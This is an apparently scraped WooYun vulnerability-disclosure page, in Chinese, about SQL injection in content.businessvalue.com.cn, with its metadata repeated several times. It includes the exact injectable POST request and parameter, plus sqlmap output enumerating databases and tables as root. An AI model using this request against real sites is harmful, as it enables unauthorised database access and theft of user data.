极客公园同服务器网站商业价值主站存在SQL注入漏洞OneMore<ROOT>可脱全网库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099591

漏洞标题：极客公园同服务器网站商业价值主站存在SQL注入漏洞OneMore<ROOT>可脱全网库

漏洞作者： BMa

提交时间：2015-03-05 15:36

修复时间：2015-04-20 14:22

公开时间：2015-04-20 14:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-05：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

极客公园同服务器网站商业价值主站存在SQL注入漏洞OneMore<ROOT>可脱全网库
http://www.wooyun.org/bugs/wooyun-2015-092526 20Rank 猪猪侠说心塞，我不要心塞 20可好- - ！

详细说明：

http://content.businessvalue.com.cn

POST /api/post_lr HTTP/1.1
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://content.businessvalue.com.cn:80/
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2286be272ed2107c3aba1526957614092f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.58%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1425517199%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22total_socre%22%3Bi%3A0%3B%7D7258cc2e8ce688f3d57842918d8e60f8
Host: content.businessvalue.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
type=1

参数：type

本来想看看counts，结果太多了，不想等，速度还是杠杠滴

web server operating system: Windows 7
web application technology: Apache 2.2.22, PHP 5.3.27
back-end DBMS: MySQL 5.0
[09:20:23] [INFO] retrieved: root@localhost
current user:    'root@localhost'
current database:    'content2014'
[09:32:19] [INFO] retrieved: tchw
[09:32:20] [INFO] retrieved: wp_options
[09:32:20] [INFO] retrieved: tchw
[09:32:20] [INFO] retrieved: wp_postmeta
[09:32:21] [INFO] retrieved: tchw
[09:32:21] [INFO] retrieved: wp_posts
[09:32:21] [INFO] retrieved: tchw
[09:32:21] [INFO] retrieved: wp_term_relationships
[09:32:21] [INFO] retrieved: tchw
[09:32:22] [INFO] retrieved: wp_term_taxonomy
[09:32:22] [INFO] retrieved: tchw
[09:32:22] [INFO] retrieved: wp_terms
[09:32:22] [INFO] retrieved: tchw
[09:32:23] [INFO] retrieved: wp_usermeta
[09:32:23] [INFO] retrieved: tchw
[09:32:23] [INFO] retrieved: wp_users
[09:32:23] [INFO] retrieved: tchw
[09:32:23] [INFO] retrieved: wx_menus
[09:32:24] [INFO] retrieved: tchw_english
[09:32:24] [INFO] retrieved: pre_add_admin
[09:32:24] [INFO] retrieved: tchw_english
[09:32:24] [INFO] retrieved: pre_add_module
[09:32:24] [INFO] retrieved: tchw_english
[09:32:25] [INFO] retrieved: pre_add_portal_module
[09:32:25] [INFO] retrieved: tchw_english
[09:32:25] [INFO] retrieved: pre_amy_user_setting
[09:32:25] [INFO] retrieved: tchw_english
[09:32:25] [INFO] retrieved: pre_common_admincp_cmenu
[09:32:25] [INFO] retrieved: tchw_english
[09:32:26] [INFO] retrieved: pre_common_admincp_group
[09:32:26] [INFO] retrieved: tchw_english
[09:32:26] [INFO] retrieved: pre_common_admincp_member
[09:32:27] [INFO] retrieved: tchw_english
[09:32:27] [INFO] retrieved: pre_common_admincp_perm
[09:32:27] [INFO] retrieved: tchw_english
[09:32:27] [INFO] retrieved: pre_common_admincp_session
[09:32:27] [INFO] retrieved: tchw_english
[09:32:28] [INFO] retrieved: pre_common_admingroup
[09:32:28] [INFO] retrieved: tchw_english
[09:32:28] [INFO] retrieved: pre_common_adminnote
[09:32:29] [INFO] retrieved: tchw_english
[09:32:29] [INFO] retrieved: pre_common_advertisement
[09:32:29] [INFO] retrieved: tchw_english
[09:32:29] [INFO] retrieved: pre_common_advertisement_custom
[09:32:29] [INFO] retrieved: tchw_english
[09:32:30] [INFO] retrieved: pre_common_banned
[09:32:30] [INFO] retrieved: tchw_english
[09:32:30] [INFO] retrieved: pre_common_block
[09:32:30] [INFO] retrieved: tchw_english
[09:32:30] [INFO] retrieved: pre_common_block_favorite
[09:32:31] [INFO] retrieved: tchw_english
[09:32:31] [INFO] retrieved: pre_common_block_item
[09:32:31] [INFO] retrieved: tchw_english
[09:32:31] [INFO] retrieved: pre_common_block_item_data
[09:32:32] [INFO] retrieved: tchw_english
[09:32:32] [INFO] retrieved: pre_common_block_permission
[09:32:32] [INFO] retrieved: tchw_english
[09:32:32] [INFO] retrieved: pre_common_block_pic
[09:32:33] [INFO] retrieved: tchw_english
[09:32:33] [INFO] retrieved: pre_common_block_style
[09:32:33] [INFO] retrieved: tchw_english
[09:32:33] [INFO] retrieved: pre_common_block_xml
[09:32:33] [INFO] retrieved: tchw_english
[09:32:34] [INFO] retrieved: pre_common_cache
[09:32:34] [INFO] retrieved: tchw_english
[09:32:34] [INFO] retrieved: pre_common_card
[09:32:34] [INFO] retrieved: tchw_english
[09:32:35] [INFO] retrieved: pre_common_card_log
[09:32:35] [INFO] retrieved: tchw_english
[09:32:35] [INFO] retrieved: pre_common_card_type
[09:32:35] [INFO] retrieved: tchw_english
[09:32:35] [INFO] retrieved: pre_common_connect_guest
[09:32:35] [INFO] retrieved: tchw_english
[09:32:36] [INFO] retrieved: pre_common_credit_log
[09:32:36] [INFO] retrieved: tchw_english
[09:32:36] [INFO] retrieved: pre_common_credit_log_field
[09:32:37] [INFO] retrieved: tchw_english
[09:32:37] [INFO] retrieved: pre_common_credit_rule
[09:32:37] [INFO] retrieved: tchw_english
[09:32:37] [INFO] retrieved: pre_common_credit_rule_log
[09:32:37] [INFO] retrieved: tchw_english
[09:32:38] [INFO] retrieved: pre_common_credit_rule_log_field
[09:32:38] [INFO] retrieved: tchw_english
[09:32:38] [INFO] retrieved: pre_common_cron
[09:32:38] [INFO] retrieved: tchw_english
[09:32:39] [INFO] retrieved: pre_common_devicetoken
[09:32:39] [INFO] retrieved: tchw_english
[09:32:39] [INFO] retrieved: pre_common_district
[09:32:40] [INFO] retrieved: tchw_english
[09:32:40] [INFO] retrieved: pre_common_diy_data
[09:32:40] [INFO] retrieved: tchw_english
[09:32:40] [INFO] retrieved: pre_common_domain
[09:32:40] [INFO] retrieved: tchw_english
[09:32:41] [INFO] retrieved: pre_common_failedip
[09:32:41] [INFO] retrieved: tchw_english
[09:32:41] [INFO] retrieved: pre_common_failedlogin
[09:32:42] [INFO] retrieved: tchw_english
[09:32:42] [INFO] retrieved: pre_common_friendlink
[09:32:42] [INFO] retrieved: tchw_english
[09:32:42] [INFO] retrieved: pre_common_grouppm
[09:32:43] [INFO] retrieved: tchw_english
[09:32:43] [INFO] retrieved: pre_common_invite
[09:32:43] [INFO] retrieved: tchw_english
[09:32:43] [INFO] retrieved: pre_common_magic
[09:32:43] [INFO] retrieved: tchw_english
[09:32:43] [INFO] retrieved: pre_common_magiclog
[09:32:44] [INFO] retrieved: tchw_english
[09:32:44] [INFO] retrieved: pre_common_mailcron
[09:32:44] [INFO] retrieved: tchw_english
[09:32:44] [INFO] retrieved: pre_common_mailqueue
[09:32:44] [INFO] retrieved: tchw_english
[09:32:45] [INFO] retrieved: pre_common_member
[09:32:45] [INFO] retrieved: tchw_english
[09:32:45] [INFO] retrieved: pre_common_member_action_log
[09:32:45] [INFO] retrieved: tchw_english
[09:32:46] [INFO] retrieved: pre_common_member_connect
[09:32:46] [INFO] retrieved: tchw_english
[09:32:46] [INFO] retrieved: pre_common_member_count
[09:32:46] [INFO] retrieved: tchw_english
[09:32:50] [INFO] retrieved: pre_common_member_crime
[09:32:50] [INFO] retrieved: tchw_english
[09:32:50] [INFO] retrieved: pre_common_member_field_forum
[09:32:51] [INFO] retrieved: tchw_english
[09:32:51] [INFO] retrieved: pre_common_member_field_home
[09:32:51] [INFO] retrieved: tchw_english
[09:32:51] [INFO] retrieved: pre_common_member_forum_buylog
[09:32:52] [INFO] retrieved: tchw_english
[09:32:52] [INFO] retrieved: pre_common_member_grouppm
[09:32:52] [INFO] retrieved: tchw_english
[09:32:52] [INFO] retrieved: pre_common_member_log
[09:32:53] [INFO] retrieved: tchw_english
[09:32:53] [INFO] retrieved: pre_common_member_magic
[09:32:53] [INFO] retrieved: tchw_english
[09:32:53] [INFO] retrieved: pre_common_member_medal
[09:32:54] [INFO] retrieved: tchw_english
[09:32:54] [INFO] retrieved: pre_common_member_newprompt
[09:32:54] [INFO] retrieved: tchw_english
[09:32:54] [INFO] retrieved: pre_common_member_profile
[09:32:54] [INFO] retrieved: tchw_english
[09:32:55] [INFO] retrieved: pre_common_member_profile_setting
[09:32:55] [INFO] retrieved: tchw_english
[09:32:55] [INFO] retrieved: pre_common_member_security
[09:32:55] [INFO] retrieved: tchw_english
[09:32:56] [INFO] retrieved: pre_common_member_secwhite
[09:32:56] [INFO] retrieved: tchw_english
[09:32:56] [INFO] retrieved: pre_common_member_stat_field
[09:32:57] [INFO] retrieved: tchw_english
[09:32:57] [INFO] retrieved: pre_common_member_status
[09:32:57] [INFO] retrieved: tchw_english
[09:32:57] [INFO] retrieved: pre_common_member_validate
[09:32:57] [INFO] retrieved: tchw_english
[09:32:57] [INFO] retrieved: pre_common_member_verify
[09:32:58] [INFO] retrieved: tchw_english
[09:32:58] [INFO] retrieved: pre_common_member_verify_info
[09:32:58] [INFO] retrieved: tchw_english
[09:32:58] [INFO] retrieved: pre_common_myapp
[09:32:59] [INFO] retrieved: tchw_english
[09:32:59] [INFO] retrieved: pre_common_myinvite
[09:32:59] [INFO] retrieved: tchw_english
[09:32:59] [INFO] retrieved: pre_common_mytask
[09:33:00] [INFO] retrieved: tchw_english
[09:33:00] [INFO] retrieved: pre_common_nav
[09:33:00] [INFO] retrieved: tchw_english
[09:33:00] [INFO] retrieved: pre_common_onlinetime
[09:33:01] [INFO] retrieved: tchw_english
[09:33:01] [INFO] retrieved: pre_common_optimizer
[09:33:01] [INFO] retrieved: tchw_english
[09:33:01] [INFO] retrieved: pre_common_patch
[09:33:01] [INFO] retrieved: tchw_english
[09:33:02] [INFO] retrieved: pre_common_plugin
[09:33:02] [INFO] retrieved: tchw_english
[09:33:02] [INFO] retrieved: pre_common_pluginvar
[09:33:02] [INFO] retrieved: tchw_english
[09:33:03] [INFO] retrieved: pre_common_process
[09:33:03] [INFO] retrieved: tchw_english
[09:33:03] [INFO] retrieved: pre_common_regip
[09:33:03] [INFO] retrieved: tchw_english
[09:33:04] [INFO] retrieved: pre_common_relatedlink
[09:33:04] [INFO] retrieved: tchw_english
[09:33:04] [INFO] retrieved: pre_common_remote_port
[09:33:04] [INFO] retrieved: tchw_english
[09:33:04] [INFO] retrieved: pre_common_report
[09:33:05] [INFO] retrieved: tchw_english
[09:33:05] [INFO] retrieved: pre_common_searchindex
[09:33:05] [INFO] retrieved: tchw_english
[09:33:05] [INFO] retrieved: pre_common_seccheck
[09:33:05] [INFO] retrieved: tchw_english
[09:33:05] [INFO] retrieved: pre_common_secquestion
[09:33:06] [INFO] retrieved: tchw_english
[09:33:06] [INFO] retrieved: pre_common_session
[09:33:06] [INFO] retrieved: tchw_english
[09:33:06] [INFO] retrieved: pre_common_setting
[09:33:06] [INFO] retrieved: tchw_english
[09:33:07] [INFO] retrieved: pre_common_smiley
[09:33:07] [INFO] retrieved: tchw_english
[09:33:07] [INFO] retrieved: pre_common_sphinxcounter
[09:33:07] [INFO] retrieved: tchw_english
[09:33:07] [INFO] retrieved: pre_common_stat
[09:33:08] [INFO] retrieved: tchw_english
[09:33:11] [INFO] retrieved: pre_common_statuser
[09:33:11] [INFO] retrieved: tchw_english
[09:33:11] [INFO] retrieved: pre_common_style
[09:33:12] [INFO] retrieved: tchw_english
[09:33:12] [INFO] retrieved: pre_common_stylevar
[09:33:12] [INFO] retrieved: tchw_english
[09:33:12] [INFO] retrieved: pre_common_syscache
[09:33:13] [INFO] retrieved: tchw_english
[09:33:13] [INFO] retrieved: pre_common_tag
[09:33:13] [INFO] retrieved: tchw_english
[09:33:13] [INFO] retrieved: pre_common_tagitem
[09:33:13] [INFO] retrieved: tchw_english
[09:33:14] [INFO] retrieved: pre_common_task
[09:33:14] [INFO] retrieved: tchw_english
[09:33:14] [INFO] retrieved: pre_common_taskvar
[09:33:14] [INFO] retrieved: tchw_english
[09:33:14] [INFO] retrieved: pre_common_template
[09:33:15] [INFO] retrieved: tchw_english
[09:33:15] [INFO] retrieved: pre_common_template_block
[09:33:15] [INFO] retrieved: tchw_english
[09:33:15] [INFO] retrieved: pre_common_template_permission
[09:33:15] [INFO] retrieved: tchw_english
[09:33:16] [INFO] retrieved: pre_common_uin_black
[09:33:16] [INFO] retrieved: tchw_english
[09:33:16] [INFO] retrieved: pre_common_usergroup
[09:33:16] [INFO] retrieved: tchw_english
[09:33:17] [INFO] retrieved: pre_common_usergroup_field
[09:33:17] [INFO] retrieved: tchw_english
[09:33:17] [INFO] retrieved: pre_common_visit
[09:33:17] [INFO] retrieved: tchw_english
[09:33:17] [INFO] retrieved: pre_common_word
[09:33:18] [INFO] retrieved: tchw_english
[09:33:18] [INFO] retrieved: pre_common_word_type
[09:33:18] [INFO] retrieved: tchw_english
[09:33:18] [INFO] retrieved: pre_connect_disktask
[09:33:18] [INFO] retrieved: tchw_english
[09:33:19] [INFO] retrieved: pre_connect_feedlog
[09:33:19] [INFO] retrieved: tchw_english
[09:33:19] [INFO] retrieved: pre_connect_memberbindlog
[09:33:19] [INFO] retrieved: tchw_english
[09:33:19] [INFO] retrieved: pre_connect_postfeedlog
[09:33:20] [INFO] retrieved: tchw_english
[09:33:20] [INFO] retrieved: pre_connect_tthreadlog
[09:33:20] [INFO] retrieved: tchw_english
[09:33:20] [INFO] retrieved: pre_forum_access
[09:33:20] [INFO] retrieved: tchw_english
[09:33:21] [INFO] retrieved: pre_forum_activity
[09:33:21] [INFO] retrieved: tchw_english
[09:33:21] [INFO] retrieved: pre_forum_activityapply
[09:33:21] [INFO] retrieved: tchw_english
[09:33:22] [INFO] retrieved: pre_forum_announcement
[09:33:22] [INFO] retrieved: tchw_english
[09:33:23] [INFO] retrieved: pre_forum_attachment
[09:33:23] [INFO] retrieved: tchw_english
[09:33:23] [INFO] retrieved: pre_forum_attachment_0
[09:33:23] [INFO] retrieved: tchw_english
[09:33:24] [INFO] retrieved: pre_forum_attachment_1
[09:33:24] [INFO] retrieved: tchw_english
[09:33:24] [INFO] retrieved: pre_forum_attachment_2
[09:33:24] [WARNING] user aborted during enumeration. sqlmap wil
l output
[09:33:24] [INFO] retrieved: 14929
[09:33:25] [INFO] retrieved: 6791
[09:33:25] [INFO] retrieved: 18295
[09:33:25] [INFO] retrieved: 4409
[09:33:25] [INFO] retrieved: 312
[09:33:25] [INFO] retrieved: 6790
[09:33:26] [INFO] retrieved: 4
[09:33:26] [INFO] retrieved: 5652
[09:33:26] [INFO] retrieved: 0
[09:33:26] [INFO] retrieved: 667
[09:33:27] [INFO] retrieved: 0
[09:33:27] [INFO] retrieved: 0
[09:33:27] [INFO] retrieved: 9711
[09:33:27] [INFO] retrieved: 24504
[09:33:27] [INFO] retrieved: 0
[09:33:28] [INFO] retrieved: 8
[09:33:28] [INFO] retrieved: 5
[09:33:28] [INFO] retrieved: 16
[09:33:28] [INFO] retrieved: 100
[09:33:29] [INFO] retrieved: 441
[09:33:29] [INFO] retrieved: 25
[09:33:29] [INFO] retrieved: 55
[09:33:29] [INFO] retrieved: 0
[09:33:30] [INFO] retrieved: 1
[09:33:30] [INFO] retrieved: 15
[09:33:30] [INFO] retrieved: 7
[09:33:30] [INFO] retrieved: 387
[09:33:31] [INFO] retrieved: 179
[09:33:31] [INFO] retrieved: 18
[09:33:31] [INFO] retrieved: 574

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

2015-03-05 15:42 | BMa ( 普通白帽子 | Rank:1776 漏洞数:192 )

@疯狗狗哥，和猪哥的一样，咋不转极客公园呢？ WooYun: 极客公园同服务器网站商业价值主站存在SQL注入漏洞

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099591

漏洞标题：极客公园同服务器网站商业价值主站存在SQL注入漏洞OneMore<ROOT>可脱全网库

相关厂商：《商业价值》杂志社

漏洞作者： BMa

提交时间：2015-03-05 15:36

修复时间：2015-04-20 14:22

公开时间：2015-04-20 14:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099591

漏洞标题：极客公园同服务器网站商业价值主站存在SQL注入漏洞OneMore<ROOT>可脱全网库

相关厂商：《商业价值》杂志社

漏洞作者： BMa

提交时间：2015-03-05 15:36

修复时间：2015-04-20 14:22

公开时间：2015-04-20 14:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-099591"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：